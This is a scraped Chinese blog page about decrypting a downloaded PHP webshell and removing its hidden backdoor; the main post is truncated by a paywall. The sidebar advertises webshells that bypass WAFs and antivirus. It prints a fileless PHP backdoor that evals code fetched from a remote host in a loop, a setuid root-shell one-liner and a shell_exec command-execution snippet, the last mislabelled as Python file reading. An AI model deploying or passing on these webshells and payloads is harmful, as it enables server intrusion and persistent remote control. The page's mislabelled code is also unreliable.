一款免杀php大马的解密与去后门

最新推荐文章于 2025-05-01 14:38:52 发布
最新推荐文章于 2025-05-01 14:38:52 发布
阅读量1.1w 收藏 5
点赞数 2
文章标签: php 解密 加密 虚拟机 网络 c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/StriveScript/article/details/6173823
版权
本文介绍了如何处理一款被加密的PHP大马,通过使用base64_decode()和gzuncompress()函数进行解密,并在源代码中查找并移除潜在的后门脚本。在虚拟机环境中进行操作,最终成功解密并提供了解密后的源码下载链接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

今天想找个php木马来管理自己的空间,但是手头没有,只好去网上找个,结果发现黑白网络有一个叫做“新版免杀php大马”的东西,于是下载了下来,我的avast果断给干掉了,尴尬 - -!好吧

于是关掉杀毒 ,重新下载,好吧,这是一个小插曲!、

 

然后把东西移动到虚拟机里面的php环境中,打开一看,有加密,用的函数是:

先用这个函数base64_decode()然后用这个函数gzuncompress()加密,好的是密文就一块啊,然后把这一块全部剪切

重新写个php文件:

 

 

就这个简单,吼吼 ,源代码一览无余啊!!!!

 

看到源代码后

Ctrl+F找这个 http://

发现没问题,然后在浏览一下源代码,发现还有个加密地方:

分别用上面的方法 发现其中有个酷似后门

 

<script sr

最低0.47元/天 解锁文章
暧昧倾城
关注
php后门文件的总结
W小哥
03-12 719
参考网址:https://xz.aliyun.com/t/5152 一、函数eval 函数 assert介绍 eval函数 eval 是一个语言构造器而不是一个函数,不能被可变函数调用 可变函数: 通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号(),让系统认为该值是一个函数,从而当做函数来执行。 通俗的说比如 <?php $a=eval;$a() ?> 这样是不行的,也...
最新PHP大马 密码admin
06-05
最新PHP大马 密码admin
php大马过所有By:鸿哥
05-25
默认shell登陆密码admin,过安全狗,护卫神,等安全是关于网络的都直接过
php-webshell大马(功能齐全)
10-28
php小马 详细的资源以后我会推荐 使用方法:上传至网站任意目录连接即可,其中 $admin['pass'] = "admin"; 后面引号里的admin为连接密码,可自由修改此密码。
PHP大马Webshell资源下载说明
最新发布
gitblog_06766的博客
05-01 395
PHP大马Webshell资源下载说明 【下载地址】PHP大马Webshell资源下载说明 PHP大马Webshell是一款功能强大的网站管理工具,适合具备合法权限的用户进行网站维护和操作。通过此工具,用户可以高效管理网站内容,但请务必谨慎操作,妥善处理使用记录。需要注意的是,该工具仅限于合法用途,严禁用于任何非法活动,...
PHP加密后门大马
07-26
PHP加密后门大马
php大马
03-03
过目前所有市面的各类防御,仅供参考。切勿用于非法途径。
php大马 webshell.zip 后门 可能报毒
04-21
webshell,可以拿站,不过一定要清除痕迹 ,不然不要做非法用途。否则后果自负。 解压密码:php
php大马
07-12
常用的php大马,可提权反弹。 常用提权大马常用的php大马,可提权反弹。 常用提权大马
java大马后门_一款php大马解密后门
weixin_32902659的博客
03-01 365
今天想找个php木马来管理自己的空间,但是手头没有,只好网上找个,结果发现黑白网络有一个叫做“新版php大马”的东西,于是下载了下来,我的avast果断给干掉了,尴尬 - -!好吧于是关掉毒 ,重新下载,好吧,这是一个小插曲!、刚下下来的php源文件下载在这里http://down.qiannao.com/space/file/strivescript/share/2011/2/7/-51...
php大马技巧 | bypass waf
weixin_30598225的博客
07-27 499
Part 1 前言    Part 2   执行代码 eval 或 preg_replace的/e修饰符来执行大马代码。     $a = 'phpinfo();'; eval($a); //eval执行php代码   编码 如果直接执行代码,是过不了waf的,我们一般需要将大马源码进行编码。 eval_gzinflat...
加密php大马.php
02-21
现在的后门里面都有内藏后门,会被黑吃黑,我分享的这个大马解密,不会被螳螂捕蝉黄雀在后。可以过一些nginx防火墙的后门,防止被爆破密码,密码输错你指定的次数就拉黑ip段,后门登录需要账号和密码,非泛滥...
超强php提权大马!过代码
06-14
超强php提权大马!过 代码
提权大马安全狗 无后门 权限强大
01-05
asp 提权大马安全狗 无后门 权限强大
php大马一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
实战分析PHP大马隐藏后门——(案例二)的PHP大马
07-07
实战分析PHP大马隐藏后门——(案例二)的PHP大马
PHP 无文件后门
oceanark的博客
07-13 697
webshell.php <?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xsser.me/webshel.txt'; while($code = file_get_contents($remote_file)){ @e
浅谈PHP大马之如何过狗过宝塔过阿里云D盾
iphp666的博客
09-17 3393
PHP方法有很多,加密混淆字符转换拆分等等都可以达到目的,下面来简单介绍几种PHP大马的方法,一句话思路也是一样 拿我很喜欢的一款php大马来示范,这个马支持cmd命令,编辑文件不会空白,界面非常经典,最重要的是支持php7,高音甜中音准低音沉,总之一句话,就是通透! <?php $password='haha';//登录密码 //----------功能程序-----------...
php超小大马_PHP大马的奇淫技巧
weixin_34150870的博客
02-28 2861
本文最后更新于可能会因为没有更新而失效。如已失效或需要修正,请留言!Part 1 Part 2大马后门检查: Fiddler 抓包 审计代码修改并运行脚本 Burp 抓包或者右键查看原代码 修改并运行代码 再使用 Burp 抓个包 查找关键字 GetHtml hmlogin localhost 等 把上图的 base64 代码解密下 Part 3大马源码这里我使用的是国外的一款大...
php大马
03-19
### 关于 PHP 大马 的相关资源和教程 #### 背景介绍 PHP大马是一种常见的Webshell形式,通常被攻击者用来控制目标服务器。通过上传并执行特定的PHP脚本文件,攻击者能够实现远程命令执行、文件管理等功能[^1]。 #### 常见的 PHP 大马 工作原理 当一个 PHP 大马 被成功部署到目标服务器后,它可以通过预设的功能模块完成一系列操作。例如,在某些情况下,PHP大马会将自身的访问地址及其密码发送至指定的外部服务器以供进一步利用[^3]。这种行为可能导致敏感数据泄露甚至整个系统的安全风险增加。 #### 如何查找学习资料? 对于希望了解如何防御此类威胁或者研究其技术细节的学习者来说,可以从以下几个方面入手: 1. **基础理论知识** 学习有关 Web 应用程序安全性基础知识非常重要,这包括但不限于 SQL 注入防护、XSS 攻击防范等内容。这些概念构成了抵御恶意软件的基础。 2. **实际案例分析** 参考具体实例有助于加深理解。比如,“实战分析PHP大马隐藏后门——案例二”提供了详细的步骤说明和技术要点解析。 3. **工具使用技巧** 掌握一些常用的安全测试工具有助于提高效率。像 IceScalpel (冰蝎) 这样的工具因其独特的特性而受到广泛关注[^4]。它的核心机制之一涉及将输入流转换成可执行指令序列 `$post=file_get_contents("php://input");` ,从而绕过传统防病毒引擎检测。 4. **操作系统层面加固措施** 如果运行的是基于 Linux 的环境,则还需要考虑系统级别的权限提升问题。一种方法是利用 Python 实现 root 权限获取 `python -c 'import os; os.setuid(0); os.system("/bin/sh")'` 。不过需要注意的是,这种方法仅适用于存在漏洞的情况下有效,并且应当谨慎对待任何可能影响合法业务流程的操作[^5]。 以下是部分推荐方向链接(假设为虚构站点用于示例展示),请自行甄别真实性合法性后再做决定: - 官方文档 https://www.php.net/manual/zh/ - OWASP Top Ten Project https://owasp.org/www-project-top-ten/ ```python # 示例代码片段演示简单的文件读取功能 <?php if(isset($_POST['cmd'])){ $output = shell_exec($_POST['cmd']); echo "<pre>$output</pre>"; } ?> ``` 上述代码展示了最原始形态下的命令注入隐患,请勿随意尝试部署以造成不必要的损失!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值